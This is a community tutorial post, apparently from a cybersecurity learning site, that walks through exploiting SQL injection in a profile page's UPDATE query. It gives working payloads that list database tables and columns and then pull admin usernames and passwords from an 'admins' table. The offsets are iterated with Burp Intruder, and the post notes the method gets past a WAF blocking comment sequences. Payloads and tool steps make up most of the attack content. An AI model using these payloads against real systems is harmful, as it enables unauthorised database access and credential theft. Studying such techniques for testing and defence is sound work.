Tutorial: SQL injection inside UPDATE query

September 15, 2016 | Views: 7134

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

SQL injection inside UPDATE query [Tutorial]

This tutorial will help you with SQLi inside UPDATE query.  SQLi is located in profile settings.

Picture of settings panel:

click image to enlarge

Vulnerable parameter is “E-mail format: ” value.  We use Temper data to intercept and change values.

Picture of intercepted values:

After we click “ok” we get this.

Picture of MySQL error:

First we wan to find database version,but what would be the easiest way.
We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use “fname” , which is string value. Database query output will be shown inside “First name” input box (where it says MaXoNe).

Picture of version query:

Picture of rendered content with database answer:

Now that we know how to create our quer lets get tables.
Full query: html’ , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = ‘

Picture of get tables query:

Picture of rendered content with database answer:

Three tables, strange!? Let’s check that again. We use count.

Full query: html’ , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = ‘

Picture of get tables count query:

Picture of rendered content with database answer:

Now is time for Burp intruder.Set browser to use 127.0.0.1 and 8080 for all URLs.
We use Burp Suite intruder with ‘Attack type’ “Sniper” and ‘Payload type’ “Numbers”

Full query: html’ , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = ‘

Picture of burp settings:

click image to enlarge

That’s all, and now you just get columns the same way with Burp Suite.
Full query: html’ , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = ‘

Just increment n with Burp Suite.

Values :
Full query: html’ , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = ‘

Just increment n with Burp Suite.

That’s it. Simple, yet effective.  I used this because, waf blocked — and –+ so I wasn’t able to close and comment out query.


I hope you enjoyed this article and look forward to doing more. Let me know what you think in the comments 🙂

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
6 Comments
  1. Does anyone proofread these?

  2. Nice article.

    Cheers!

  3. Nice tutorual.

    balkan boy. 😀

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel